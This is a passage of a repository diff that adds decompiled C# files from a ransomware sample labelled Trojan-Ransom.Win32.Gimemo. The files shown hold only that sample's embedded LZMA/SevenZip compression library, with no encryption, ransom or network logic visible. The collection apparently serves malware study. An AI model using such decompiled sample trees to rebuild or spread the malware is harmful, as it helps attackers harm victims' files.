num6 = this._son[(IntPtr) index3];
val2 = num9;
}
else
{
this._son[(IntPtr) index2] = num6;
index2 = index4;
num6 = this._son[(IntPtr) index2];
val1 = num9;
}
}
this._son[(IntPtr) index2] = this._son[(IntPtr) index3] = 0U;
label_18:
this.MovePos();
label_19:;
}
while (--num != 0U);
}
private void NormalizeLinks(uint[] items, uint numItems, uint subValue)
{
for (uint index = 0; index < numItems; ++index)
{
uint num1 = items[(IntPtr) index];
uint num2 = num1 > subValue ? num1 - subValue : 0U;
items[(IntPtr) index] = num2;
}
}
private void Normalize()
{
uint subValue = this._pos - this._cyclicBufferSize;
this.NormalizeLinks(this._son, this._cyclicBufferSize * 2U, subValue);
this.NormalizeLinks(this._hash, this._hashSizeSum, subValue);
this.ReduceOffsets((int) subValue);
}
public void SetCutValue(uint cutValue) => this._cutValue = cutValue;
}
}
MSIL/Trojan-Ransom/Win32/G/Trojan-Ransom.Win32.Gimemo.ayt-624a52079bf1703bcd3bcc9d2d3716b6126fd05655e25289d19142f9aae02eb5/Compression/LZ/IInWindowStream.cs
+25
View File
@@ -0,0 +1,25 @@
// Decompiled with JetBrains decompiler
// Type: SevenZip.Compression.LZ.IInWindowStream
// Assembly: P4CTEMP, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 7BE4E538-8555-4C2E-974B-99E556F5462C
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-Ransom.Win32.Gimemo.ayt-624a52079bf1703bcd3bcc9d2d3716b6126fd05655e25289d19142f9aae02eb5.exe
using System.IO;
namespace SevenZip.Compression.LZ
{
internal interface IInWindowStream
{
void SetStream(Stream inStream);
void Init();
void ReleaseStream();
byte GetIndexByte(int index);
uint GetMatchLen(int index, uint distance, uint limit);
uint GetNumAvailableBytes();
}
}
MSIL/Trojan-Ransom/Win32/G/Trojan-Ransom.Win32.Gimemo.ayt-624a52079bf1703bcd3bcc9d2d3716b6126fd05655e25289d19142f9aae02eb5/Compression/LZ/IMatchFinder.cs
+21
View File
@@ -0,0 +1,21 @@
// Decompiled with JetBrains decompiler
// Type: SevenZip.Compression.LZ.IMatchFinder
// Assembly: P4CTEMP, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 7BE4E538-8555-4C2E-974B-99E556F5462C
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-Ransom.Win32.Gimemo.ayt-624a52079bf1703bcd3bcc9d2d3716b6126fd05655e25289d19142f9aae02eb5.exe
namespace SevenZip.Compression.LZ
{
internal interface IMatchFinder : IInWindowStream
{
void Create(
uint historySize,
uint keepAddBufferBefore,
uint matchMaxLen,
uint keepAddBufferAfter);
uint GetMatches(uint[] distances);
void Skip(uint num);
}
}
MSIL/Trojan-Ransom/Win32/G/Trojan-Ransom.Win32.Gimemo.ayt-624a52079bf1703bcd3bcc9d2d3716b6126fd05655e25289d19142f9aae02eb5/Compression/LZ/InWindow.cs
+127
View File
@@ -0,0 +1,127 @@
// Decompiled with JetBrains decompiler
// Type: SevenZip.Compression.LZ.InWindow
// Assembly: P4CTEMP, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 7BE4E538-8555-4C2E-974B-99E556F5462C
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-Ransom.Win32.Gimemo.ayt-624a52079bf1703bcd3bcc9d2d3716b6126fd05655e25289d19142f9aae02eb5.exe
using System;
using System.IO;
namespace SevenZip.Compression.LZ
{
public class InWindow
{
public byte[] _bufferBase;
private Stream _stream;
private uint _posLimit;
private bool _streamEndWasReached;
private uint _pointerToLastSafePosition;
public uint _bufferOffset;
public uint _blockSize;
public uint _pos;
private uint _keepSizeBefore;
private uint _keepSizeAfter;
public uint _streamPos;
public void MoveBlock()
{
uint num1 = this._bufferOffset + this._pos - this._keepSizeBefore;
if (num1 > 0U)
--num1;
uint num2 = this._bufferOffset + this._streamPos - num1;
for (uint index = 0; index < num2; ++index)
this._bufferBase[(IntPtr) index] = this._bufferBase[(IntPtr) (num1 + index)];
this._bufferOffset -= num1;
}
public virtual void ReadBlock()
{
if (this._streamEndWasReached)
return;
while (true)
{
do
{
int count = -(int) this._bufferOffset + (int) this._blockSize - (int) this._streamPos;
if (count == 0)
return;
int num = this._stream.Read(this._bufferBase, (int) this._bufferOffset + (int) this._streamPos, count);
if (num == 0)
{
this._posLimit = this._streamPos;
if (this._bufferOffset + this._posLimit > this._pointerToLastSafePosition)
this._posLimit = this._pointerToLastSafePosition - this._bufferOffset;
this._streamEndWasReached = true;
return;
}
this._streamPos += (uint) num;
}
while (this._streamPos < this._pos + this._keepSizeAfter);
this._posLimit = this._streamPos - this._keepSizeAfter;
}
}
private void Free() => this._bufferBase = (byte[]) null;
public void Create(uint keepSizeBefore, uint keepSizeAfter, uint keepSizeReserv)
{
this._keepSizeBefore = keepSizeBefore;
this._keepSizeAfter = keepSizeAfter;
uint num = keepSizeBefore + keepSizeAfter + keepSizeReserv;
if (this._bufferBase == null || (int) this._blockSize != (int) num)
{
this.Free();
this._blockSize = num;
this._bufferBase = new byte[(IntPtr) this._blockSize];
}
this._pointerToLastSafePosition = this._blockSize - keepSizeAfter;
}
public void SetStream(Stream stream) => this._stream = stream;
public void ReleaseStream() => this._stream = (Stream) null;
public void Init()
{
this._bufferOffset = 0U;
this._pos = 0U;
this._streamPos = 0U;
this._streamEndWasReached = false;
this.ReadBlock();
}
public void MovePos()
{
++this._pos;
if (this._pos <= this._posLimit)
return;
if (this._bufferOffset + this._pos > this._pointerToLastSafePosition)
this.MoveBlock();
this.ReadBlock();
}
public byte GetIndexByte(int index) => this._bufferBase[(long) (this._bufferOffset + this._pos) + (long) index];
public uint GetMatchLen(int index, uint distance, uint limit)
{
if (this._streamEndWasReached && (long) this._pos + (long) index + (long) limit > (long) this._streamPos)
limit = this._streamPos - (uint) ((ulong) this._pos + (ulong) index);
++distance;
uint num = (uint) ((int) this._bufferOffset + (int) this._pos + index);
uint matchLen = 0;
while (matchLen < limit && (int) this._bufferBase[(IntPtr) (num + matchLen)] == (int) this._bufferBase[(IntPtr) (num + matchLen - distance)])
++matchLen;
return matchLen;
}
public uint GetNumAvailableBytes() => this._streamPos - this._pos;
public void ReduceOffsets(int subValue)
{
this._bufferOffset += (uint) subValue;
this._posLimit -= (uint) subValue;
this._pos -= (uint) subValue;
this._streamPos -= (uint) subValue;
}
}
}
MSIL/Trojan-Ransom/Win32/G/Trojan-Ransom.Win32.Gimemo.ayt-624a52079bf1703bcd3bcc9d2d3716b6126fd05655e25289d19142f9aae02eb5/Compression/LZ/OutWindow.cs
+113
View File
@@ -0,0 +1,113 @@
// Decompiled with JetBrains decompiler
// Type: SevenZip.Compression.LZ.OutWindow
// Assembly: P4CTEMP, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 7BE4E538-8555-4C2E-974B-99E556F5462C
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-Ransom.Win32.Gimemo.ayt-624a52079bf1703bcd3bcc9d2d3716b6126fd05655e25289d19142f9aae02eb5.exe
using System;
using System.IO;
namespace SevenZip.Compression.LZ
{
public class OutWindow
{
private byte[] _buffer;
private uint _pos;
private uint _windowSize;
private uint _streamPos;
private Stream _stream;
public uint TrainSize;
public void Create(uint windowSize)
{
if ((int) this._windowSize != (int) windowSize)
this._buffer = new byte[(IntPtr) windowSize];
this._windowSize = windowSize;
this._pos = 0U;
this._streamPos = 0U;
}
public void Init(Stream stream, bool solid)
{
this.ReleaseStream();
this._stream = stream;
if (solid)
return;
this._streamPos = 0U;
this._pos = 0U;
this.TrainSize = 0U;
}
public bool Train(Stream stream)
{
long length = stream.Length;
uint num1 = length < (long) this._windowSize ? (uint) length : this._windowSize;
this.TrainSize = num1;
stream.Position = length - (long) num1;
this._streamPos = this._pos = 0U;
while (num1 > 0U)
{
uint count = this._windowSize - this._pos;
if (num1 < count)
count = num1;
int num2 = stream.Read(this._buffer, (int) this._pos, (int) count);
if (num2 == 0)
return false;
num1 -= (uint) num2;
this._pos += (uint) num2;
this._streamPos += (uint) num2;
if ((int) this._pos == (int) this._windowSize)
this._streamPos = this._pos = 0U;
}
return true;
}
public void ReleaseStream()
{
this.Flush();
this._stream = (Stream) null;
}
public void Flush()
{
uint count = this._pos - this._streamPos;
if (count == 0U)
return;
this._stream.Write(this._buffer, (int) this._streamPos, (int) count);
if (this._pos >= this._windowSize)
this._pos = 0U;
this._streamPos = this._pos;
}
public void CopyBlock(uint distance, uint len)
{
uint num = (uint) ((int) this._pos - (int) distance - 1);
if (num >= this._windowSize)
num += this._windowSize;
for (; len > 0U; --len)
{
if (num >= this._windowSize)
num = 0U;
this._buffer[(IntPtr) this._pos++] = this._buffer[(IntPtr) num++];
if (this._pos >= this._windowSize)
this.Flush();
}
}
public void PutByte(byte b)
{
this._buffer[(IntPtr) this._pos++] = b;
if (this._pos < this._windowSize)
return;
this.Flush();
}
public byte GetByte(uint distance)
{
uint index = (uint) ((int) this._pos - (int) distance - 1);
if (index >= this._windowSize)
index += this._windowSize;
return this._buffer[(IntPtr) index];
}
}
}
MSIL/Trojan-Ransom/Win32/G/Trojan-Ransom.Win32.Gimemo.ayt-624a52079bf1703bcd3bcc9d2d3716b6126fd05655e25289d19142f9aae02eb5/Compression/LZMA/Base.cs
+70
View File
@@ -0,0 +1,70 @@
// Decompiled with JetBrains decompiler
// Type: SevenZip.Compression.LZMA.Base
// Assembly: P4CTEMP, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 7BE4E538-8555-4C2E-974B-99E556F5462C
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-Ransom.Win32.Gimemo.ayt-624a52079bf1703bcd3bcc9d2d3716b6126fd05655e25289d19142f9aae02eb5.exe
namespace SevenZip.Compression.LZMA
{
internal abstract class Base
{
public const uint kNumRepDistances = 4;
public const uint kNumStates = 12;
public const int kNumPosSlotBits = 6;
public const int kDicLogSizeMin = 0;
public const int kNumLenToPosStatesBits = 2;
public const uint kNumLenToPosStates = 4;
public const uint kMatchMinLen = 2;
public const int kNumAlignBits = 4;
public const uint kAlignTableSize = 16;
public const uint kAlignMask = 15;
public const uint kStartPosModelIndex = 4;
public const uint kEndPosModelIndex = 14;
public const uint kNumPosModels = 10;
public const uint kNumFullDistances = 128;
public const uint kNumLitPosStatesBitsEncodingMax = 4;
public const uint kNumLitContextBitsMax = 8;
public const int kNumPosStatesBitsMax = 4;
public const uint kNumPosStatesMax = 16;
public const int kNumPosStatesBitsEncodingMax = 4;
public const uint kNumPosStatesEncodingMax = 16;
public const int kNumLowLenBits = 3;
public const int kNumMidLenBits = 3;
public const int kNumHighLenBits = 8;
public const uint kNumLowLenSymbols = 8;
public const uint kNumMidLenSymbols = 8;
public const uint kNumLenSymbols = 272;
public const uint kMatchMaxLen = 273;
public static uint GetLenToPosState(uint len)
{
len -= 2U;
return len < 4U ? len : 3U;
}
public struct State
{
public uint Index;
public void Init() => this.Index = 0U;
public void UpdateChar()
{
if (this.Index < 4U)
this.Index = 0U;
else if (this.Index < 10U)
this.Index -= 3U;
else
this.Index -= 6U;
}
public void UpdateMatch() => this.Index = this.Index < 7U ? 7U : 10U;
public void UpdateRep() => this.Index = this.Index < 7U ? 8U : 11U;
public void UpdateShortRep() => this.Index = this.Index < 7U ? 9U : 11U;
public bool IsCharState() => this.Index < 7U;
}
}
}
MSIL/Trojan-Ransom/Win32/G/Trojan-Ransom.Win32.Gimemo.ayt-624a52079bf1703bcd3bcc9d2d3716b6126fd05655e25289d19142f9aae02eb5/Compression/LZMA/Decoder.cs
+353
View File
@@ -0,0 +1,353 @@
// Decompiled with JetBrains decompiler
// Type: SevenZip.Compression.LZMA.Decoder
// Assembly: P4CTEMP, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 7BE4E538-8555-4C2E-974B-99E556F5462C
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-Ransom.Win32.Gimemo.ayt-624a52079bf1703bcd3bcc9d2d3716b6126fd05655e25289d19142f9aae02eb5.exe
using SevenZip.Compression.LZ;
using SevenZip.Compression.RangeCoder;
using System;
using System.IO;
namespace SevenZip.Compression.LZMA
{
public class Decoder : ICoder, ISetDecoderProperties
{
private OutWindow m_OutWindow = new OutWindow();
private SevenZip.Compression.RangeCoder.Decoder m_RangeDecoder = new SevenZip.Compression.RangeCoder.Decoder();
private BitDecoder[] m_IsMatchDecoders = new BitDecoder[new IntPtr(192)];
private BitDecoder[] m_IsRepDecoders = new BitDecoder[new IntPtr(12)];
private BitDecoder[] m_IsRepG0Decoders = new BitDecoder[new IntPtr(12)];
private BitDecoder[] m_IsRepG1Decoders = new BitDecoder[new IntPtr(12)];
private BitDecoder[] m_IsRepG2Decoders = new BitDecoder[new IntPtr(12)];
private BitDecoder[] m_IsRep0LongDecoders = new BitDecoder[new IntPtr(192)];
private BitTreeDecoder[] m_PosSlotDecoder = new BitTreeDecoder[new IntPtr(4)];
private BitDecoder[] m_PosDecoders = new BitDecoder[new IntPtr(114)];
private BitTreeDecoder m_PosAlignDecoder = new BitTreeDecoder(4);
private Decoder.LenDecoder m_LenDecoder = new Decoder.LenDecoder();
private Decoder.LenDecoder m_RepLenDecoder = new Decoder.LenDecoder();
private Decoder.LiteralDecoder m_LiteralDecoder = new Decoder.LiteralDecoder();
private uint m_DictionarySize;
private uint m_DictionarySizeCheck;
private uint m_PosStateMask;
private bool _solid;
public Decoder()
{
this.m_DictionarySize = uint.MaxValue;
for (int index = 0; index < 4; ++index)
this.m_PosSlotDecoder[index] = new BitTreeDecoder(6);
}
private void SetDictionarySize(uint dictionarySize)
{
if ((int) this.m_DictionarySize == (int) dictionarySize)
return;
this.m_DictionarySize = dictionarySize;
this.m_DictionarySizeCheck = Math.Max(this.m_DictionarySize, 1U);
this.m_OutWindow.Create(Math.Max(this.m_DictionarySizeCheck, 4096U));
}
private void SetLiteralProperties(int lp, int lc)
{
if (lp > 8)
throw new InvalidParamException();
if (lc > 8)
throw new InvalidParamException();
this.m_LiteralDecoder.Create(lp, lc);
}
private void SetPosBitsProperties(int pb)
{
if (pb > 4)
throw new InvalidParamException();
uint numPosStates = (uint) (1 << pb);
this.m_LenDecoder.Create(numPosStates);
this.m_RepLenDecoder.Create(numPosStates);
this.m_PosStateMask = numPosStates - 1U;
}
private void Init(Stream inStream, Stream outStream)
{
this.m_RangeDecoder.Init(inStream);
this.m_OutWindow.Init(outStream, this._solid);
for (uint index1 = 0; index1 < 12U; ++index1)
{
for (uint index2 = 0; index2 <= this.m_PosStateMask; ++index2)
{
uint index3 = (index1 << 4) + index2;
this.m_IsMatchDecoders[(IntPtr) index3].Init();
this.m_IsRep0LongDecoders[(IntPtr) index3].Init();
}
this.m_IsRepDecoders[(IntPtr) index1].Init();
this.m_IsRepG0Decoders[(IntPtr) index1].Init();
this.m_IsRepG1Decoders[(IntPtr) index1].Init();
this.m_IsRepG2Decoders[(IntPtr) index1].Init();
}
this.m_LiteralDecoder.Init();
for (uint index = 0; index < 4U; ++index)
this.m_PosSlotDecoder[(IntPtr) index].Init();
for (uint index = 0; index < 114U; ++index)
this.m_PosDecoders[(IntPtr) index].Init();
this.m_LenDecoder.Init();
this.m_RepLenDecoder.Init();
this.m_PosAlignDecoder.Init();
}
public void Code(
Stream inStream,
Stream outStream,
long inSize,
long outSize,
ICodeProgress progress)
{
this.Init(inStream, outStream);
Base.State state = new Base.State();
state.Init();
uint distance = 0;
uint num1 = 0;
uint num2 = 0;
uint num3 = 0;
ulong pos = 0;
ulong num4 = (ulong) outSize;
if (pos < num4)
{
if (this.m_IsMatchDecoders[(IntPtr) (state.Index << 4)].Decode(this.m_RangeDecoder) != 0U)
throw new DataErrorException();
state.UpdateChar();
this.m_OutWindow.PutByte(this.m_LiteralDecoder.DecodeNormal(this.m_RangeDecoder, 0U, (byte) 0));
++pos;
}
while (pos < num4)
{
uint posState = (uint) pos & this.m_PosStateMask;
if (this.m_IsMatchDecoders[(IntPtr) ((state.Index << 4) + posState)].Decode(this.m_RangeDecoder) == 0U)
{
byte prevByte = this.m_OutWindow.GetByte(0U);
this.m_OutWindow.PutByte(state.IsCharState() ? this.m_LiteralDecoder.DecodeNormal(this.m_RangeDecoder, (uint) pos, prevByte) : this.m_LiteralDecoder.DecodeWithMatchByte(this.m_RangeDecoder, (uint) pos, prevByte, this.m_OutWindow.GetByte(distance)));
state.UpdateChar();
++pos;
}
else
{
uint len;
if (this.m_IsRepDecoders[(IntPtr) state.Index].Decode(this.m_RangeDecoder) == 1U)
{
if (this.m_IsRepG0Decoders[(IntPtr) state.Index].Decode(this.m_RangeDecoder) == 0U)
{
if (this.m_IsRep0LongDecoders[(IntPtr) ((state.Index << 4) + posState)].Decode(this.m_RangeDecoder) == 0U)
{
state.UpdateShortRep();
this.m_OutWindow.PutByte(this.m_OutWindow.GetByte(distance));
++pos;
continue;
}
}
else
{
uint num5;
if (this.m_IsRepG1Decoders[(IntPtr) state.Index].Decode(this.m_RangeDecoder) == 0U)
{
num5 = num1;
}
else
{
if (this.m_IsRepG2Decoders[(IntPtr) state.Index].Decode(this.m_RangeDecoder) == 0U)
{
num5 = num2;
}
else
{
num5 = num3;
num3 = num2;
}
num2 = num1;
}
num1 = distance;
distance = num5;
}
len = this.m_RepLenDecoder.Decode(this.m_RangeDecoder, posState) + 2U;
state.UpdateRep();
}
else
{
num3 = num2;
num2 = num1;
num1 = distance;
len = 2U + this.m_LenDecoder.Decode(this.m_RangeDecoder, posState);
state.UpdateMatch();
uint num6 = this.m_PosSlotDecoder[(IntPtr) Base.GetLenToPosState(len)].Decode(this.m_RangeDecoder);
if (num6 >= 4U)
{
int NumBitLevels = (int) (num6 >> 1) - 1;
uint num7 = (uint) ((2 | (int) num6 & 1) << NumBitLevels);
distance = num6 >= 14U ? num7 + (this.m_RangeDecoder.DecodeDirectBits(NumBitLevels - 4) << 4) + this.m_PosAlignDecoder.ReverseDecode(this.m_RangeDecoder) : num7 + BitTreeDecoder.ReverseDecode(this.m_PosDecoders, (uint) ((int) num7 - (int) num6 - 1), this.m_RangeDecoder, NumBitLevels);
}
else
distance = num6;
}
if ((ulong) distance >= (ulong) this.m_OutWindow.TrainSize + pos || distance >= this.m_DictionarySizeCheck)
{
if (distance != uint.MaxValue)
throw new DataErrorException();
break;
}
this.m_OutWindow.CopyBlock(distance, len);
pos += (ulong) len;
}
}
this.m_OutWindow.Flush();
this.m_OutWindow.ReleaseStream();
this.m_RangeDecoder.ReleaseStream();
}
public void SetDecoderProperties(byte[] properties)
{
if (properties.Length < 5)
throw new InvalidParamException();
int lc = (int) properties[0] % 9;
int num = (int) properties[0] / 9;
int lp = num % 5;
int pb = num / 5;
if (pb > 4)
throw new InvalidParamException();
uint dictionarySize = 0;
for (int index = 0; index < 4; ++index)
dictionarySize += (uint) properties[1 + index] << index * 8;
this.SetDictionarySize(dictionarySize);
this.SetLiteralProperties(lp, lc);
this.SetPosBitsProperties(pb);
}
public bool Train(Stream stream)
{
this._solid = true;
return this.m_OutWindow.Train(stream);
}
private class LenDecoder
{
private BitDecoder m_Choice = new BitDecoder();
private BitDecoder m_Choice2 = new BitDecoder();
private BitTreeDecoder[] m_LowCoder = new BitTreeDecoder[new IntPtr(16)];
private BitTreeDecoder[] m_MidCoder = new BitTreeDecoder[new IntPtr(16)];
private BitTreeDecoder m_HighCoder = new BitTreeDecoder(8);
private uint m_NumPosStates;
public void Create(uint numPosStates)
{
for (uint numPosStates1 = this.m_NumPosStates; numPosStates1 < numPosStates; ++numPosStates1)
{
this.m_LowCoder[(IntPtr) numPosStates1] = new BitTreeDecoder(3);
this.m_MidCoder[(IntPtr) numPosStates1] = new BitTreeDecoder(3);
}
this.m_NumPosStates = numPosStates;
}
public void Init()
{
this.m_Choice.Init();
for (uint index = 0; index < this.m_NumPosStates; ++index)
{
this.m_LowCoder[(IntPtr) index].Init();
this.m_MidCoder[(IntPtr) index].Init();
}
this.m_Choice2.Init();
this.m_HighCoder.Init();
}
public uint Decode(SevenZip.Compression.RangeCoder.Decoder rangeDecoder, uint posState)
{
if (this.m_Choice.Decode(rangeDecoder) == 0U)
return this.m_LowCoder[(IntPtr) posState].Decode(rangeDecoder);
uint num = 8;
return this.m_Choice2.Decode(rangeDecoder) != 0U ? num + 8U + this.m_HighCoder.Decode(rangeDecoder) : num + this.m_MidCoder[(IntPtr) posState].Decode(rangeDecoder);
}
}
private class LiteralDecoder
{
private Decoder.LiteralDecoder.Decoder2[] m_Coders;
private int m_NumPrevBits;
private int m_NumPosBits;
private uint m_PosMask;
public void Create(int numPosBits, int numPrevBits)
{
if (this.m_Coders != null && this.m_NumPrevBits == numPrevBits && this.m_NumPosBits == numPosBits)
return;
this.m_NumPosBits = numPosBits;
this.m_PosMask = (uint) ((1 << numPosBits) - 1);
this.m_NumPrevBits = numPrevBits;
uint length = (uint) (1 << this.m_NumPrevBits + this.m_NumPosBits);
this.m_Coders = new Decoder.LiteralDecoder.Decoder2[(IntPtr) length];
for (uint index = 0; index < length; ++index)
this.m_Coders[(IntPtr) index].Create();
}
public void Init()
{
uint num = (uint) (1 << this.m_NumPrevBits + this.m_NumPosBits);
for (uint index = 0; index < num; ++index)
this.m_Coders[(IntPtr) index].Init();
}
private uint GetState(uint pos, byte prevByte) => (uint) ((((int) pos & (int) this.m_PosMask) << this.m_NumPrevBits) + ((int) prevByte >> 8 - this.m_NumPrevBits));
public byte DecodeNormal(SevenZip.Compression.RangeCoder.Decoder rangeDecoder, uint pos, byte prevByte) => this.m_Coders[(IntPtr) this.GetState(pos, prevByte)].DecodeNormal(rangeDecoder);
public byte DecodeWithMatchByte(
SevenZip.Compression.RangeCoder.Decoder rangeDecoder,
uint pos,
byte prevByte,
byte matchByte)
{
return this.m_Coders[(IntPtr) this.GetState(pos, prevByte)].DecodeWithMatchByte(rangeDecoder, matchByte);
}
private struct Decoder2
{
private BitDecoder[] m_Decoders;
public void Create() => this.m_Decoders = new BitDecoder[768];
public void Init()
{
for (int index = 0; index < 768; ++index)
this.m_Decoders[index].Init();
}
public byte DecodeNormal(SevenZip.Compression.RangeCoder.Decoder rangeDecoder)
{
uint index = 1;
do
{
index = index << 1 | this.m_Decoders[(IntPtr) index].Decode(rangeDecoder);
}
while (index < 256U);
return (byte) index;
}
public byte DecodeWithMatchByte(SevenZip.Compression.RangeCoder.Decoder rangeDecoder, byte matchByte)
{
uint index = 1;
do
{
uint num1 = (uint) ((int) matchByte >> 7 & 1);
matchByte <<= 1;
uint num2 = this.m_Decoders[(IntPtr) ((uint) (1 + (int) num1 << 8) + index)].Decode(rangeDecoder);
index = index << 1 | num2;
if ((int) num1 != (int) num2)
{
while (index < 256U)
index = index << 1 | this.m_Decoders[(IntPtr) index].Decode(rangeDecoder);
break;
}
}
while (index < 256U);
return (byte) index;
}
}
}
}
}
MSIL/Trojan-Ransom/Win32/G/Trojan-Ransom.Win32.Gimemo.ayt-624a52079bf1703bcd3bcc9d2d3716b6126fd05655e25289d19142f9aae02eb5/Compression/LZMA/Encoder.cs
+1329
View File
File diff suppressed because it is too large Load Diff
MSIL/Trojan-Ransom/Win32/G/Trojan-Ransom.Win32.Gimemo.ayt-624a52079bf1703bcd3bcc9d2d3716b6126fd05655e25289d19142f9aae02eb5/Compression/LZMA/SevenZipHelper.cs
+76
View File
@@ -0,0 +1,76 @@
// Decompiled with JetBrains decompiler
// Type: SevenZip.Compression.LZMA.SevenZipHelper
// Assembly: P4CTEMP, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 7BE4E538-8555-4C2E-974B-99E556F5462C
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-Ransom.Win32.Gimemo.ayt-624a52079bf1703bcd3bcc9d2d3716b6126fd05655e25289d19142f9aae02eb5.exe
using System;
using System.IO;
namespace SevenZip.Compression.LZMA
{
public static class SevenZipHelper
{
private static int dictionary = 8388608;
private static bool eos = false;
private static CoderPropID[] propIDs = new CoderPropID[8]
{
CoderPropID.DictionarySize,
CoderPropID.PosStateBits,
CoderPropID.LitContextBits,
CoderPropID.LitPosBits,
CoderPropID.Algorithm,
CoderPropID.NumFastBytes,
CoderPropID.MatchFinder,
CoderPropID.EndMarker
};
private static object[] properties = new object[8]
{
(object) SevenZipHelper.dictionary,
(object) 2,
(object) 3,
(object) 0,
(object) 2,
(object) 128,
(object) "bt4",
(object) SevenZipHelper.eos
};
public static byte[] Compress(byte[] inputBytes)
{
MemoryStream inStream = new MemoryStream(inputBytes);
MemoryStream outStream = new MemoryStream();
Encoder encoder = new Encoder();
encoder.SetCoderProperties(SevenZipHelper.propIDs, SevenZipHelper.properties);
encoder.WriteCoderProperties((Stream) outStream);
long length = inStream.Length;
for (int index = 0; index < 8; ++index)
outStream.WriteByte((byte) (length >> 8 * index));
encoder.Code((Stream) inStream, (Stream) outStream, -1L, -1L, (ICodeProgress) null);
return outStream.ToArray();
}
public static byte[] Decompress(byte[] inputBytes)
{
MemoryStream inStream = new MemoryStream(inputBytes);
Decoder decoder = new Decoder();
inStream.Seek(0L, SeekOrigin.Begin);
MemoryStream outStream = new MemoryStream();
byte[] numArray = new byte[5];
if (inStream.Read(numArray, 0, 5) != 5)
throw new Exception("input .lzma is too short");
long outSize = 0;
for (int index = 0; index < 8; ++index)
{
int num = inStream.ReadByte();
if (num < 0)
throw new Exception("Can't Read 1");
outSize |= (long) (byte) num << 8 * index;
}
decoder.SetDecoderProperties(numArray);
long inSize = inStream.Length - inStream.Position;
decoder.Code((Stream) inStream, (Stream) outStream, inSize, outSize, (ICodeProgress) null);
return outStream.ToArray();
}
}
}
MSIL/Trojan-Ransom/Win32/G/Trojan-Ransom.Win32.Gimemo.ayt-624a52079bf1703bcd3bcc9d2d3716b6126fd05655e25289d19142f9aae02eb5/Compression/RangeCoder/BitDecoder.cs
+51
View File
@@ -0,0 +1,51 @@
// Decompiled with JetBrains decompiler
// Type: SevenZip.Compression.RangeCoder.BitDecoder
// Assembly: P4CTEMP, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 7BE4E538-8555-4C2E-974B-99E556F5462C
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-Ransom.Win32.Gimemo.ayt-624a52079bf1703bcd3bcc9d2d3716b6126fd05655e25289d19142f9aae02eb5.exe
namespace SevenZip.Compression.RangeCoder
{
internal struct BitDecoder
{
public const int kNumBitModelTotalBits = 11;
public const uint kBitModelTotal = 2048;
private const int kNumMoveBits = 5;
private uint Prob;
public void UpdateModel(int numMoveBits, uint symbol)
{
if (symbol == 0U)
this.Prob += 2048U - this.Prob >> numMoveBits;
else
this.Prob -= this.Prob >> numMoveBits;
}
public void Init() => this.Prob = 1024U;
public uint Decode(Decoder rangeDecoder)
{
uint num = (rangeDecoder.Range >> 11) * this.Prob;
if (rangeDecoder.Code < num)
{
rangeDecoder.Range = num;
this.Prob += 2048U - this.Prob >> 5;
if (rangeDecoder.Range < 16777216U)
{
rangeDecoder.Code = rangeDecoder.Code << 8 | (uint) (byte) rangeDecoder.Stream.ReadByte();
rangeDecoder.Range <<= 8;
}
return 0;
}
rangeDecoder.Range -= num;
rangeDecoder.Code -= num;
this.Prob -= this.Prob >> 5;
if (rangeDecoder.Range < 16777216U)
{
rangeDecoder.Code = rangeDecoder.Code << 8 | (uint) (byte) rangeDecoder.Stream.ReadByte();
rangeDecoder.Range <<= 8;
}
return 1;
}
}
}
MSIL/Trojan-Ransom/Win32/G/Trojan-Ransom.Win32.Gimemo.ayt-624a52079bf1703bcd3bcc9d2d3716b6126fd05655e25289d19142f9aae02eb5/Compression/RangeCoder/BitEncoder.cs
+68
View File
@@ -0,0 +1,68 @@
// Decompiled with JetBrains decompiler
// Type: SevenZip.Compression.RangeCoder.BitEncoder
// Assembly: P4CTEMP, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 7BE4E538-8555-4C2E-974B-99E556F5462C
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-Ransom.Win32.Gimemo.ayt-624a52079bf1703bcd3bcc9d2d3716b6126fd05655e25289d19142f9aae02eb5.exe
using System;
namespace SevenZip.Compression.RangeCoder
{
internal struct BitEncoder
{
public const int kNumBitModelTotalBits = 11;
public const uint kBitModelTotal = 2048;
private const int kNumMoveBits = 5;
private const int kNumMoveReducingBits = 2;
public const int kNumBitPriceShiftBits = 6;
private uint Prob;
private static uint[] ProbPrices = new uint[new IntPtr(512)];
public void Init() => this.Prob = 1024U;
public void UpdateModel(uint symbol)
{
if (symbol == 0U)
this.Prob += 2048U - this.Prob >> 5;
else
this.Prob -= this.Prob >> 5;
}
public void Encode(Encoder encoder, uint symbol)
{
uint num = (encoder.Range >> 11) * this.Prob;
if (symbol == 0U)
{
encoder.Range = num;
this.Prob += 2048U - this.Prob >> 5;
}
else
{
encoder.Low += (ulong) num;
encoder.Range -= num;
this.Prob -= this.Prob >> 5;
}
if (encoder.Range >= 16777216U)
return;
encoder.Range <<= 8;
encoder.ShiftLow();
}
static BitEncoder()
{
for (int index1 = 8; index1 >= 0; --index1)
{
uint num1 = (uint) (1 << 9 - index1 - 1);
uint num2 = (uint) (1 << 9 - index1);
for (uint index2 = num1; index2 < num2; ++index2)
BitEncoder.ProbPrices[(IntPtr) index2] = (uint) (index1 << 6) + ((uint) ((int) num2 - (int) index2 << 6) >> 9 - index1 - 1);
}
}
public uint GetPrice(uint symbol) => BitEncoder.ProbPrices[(((long) (this.Prob - symbol) ^ (long) -(int) symbol) & 2047L) >> 2];
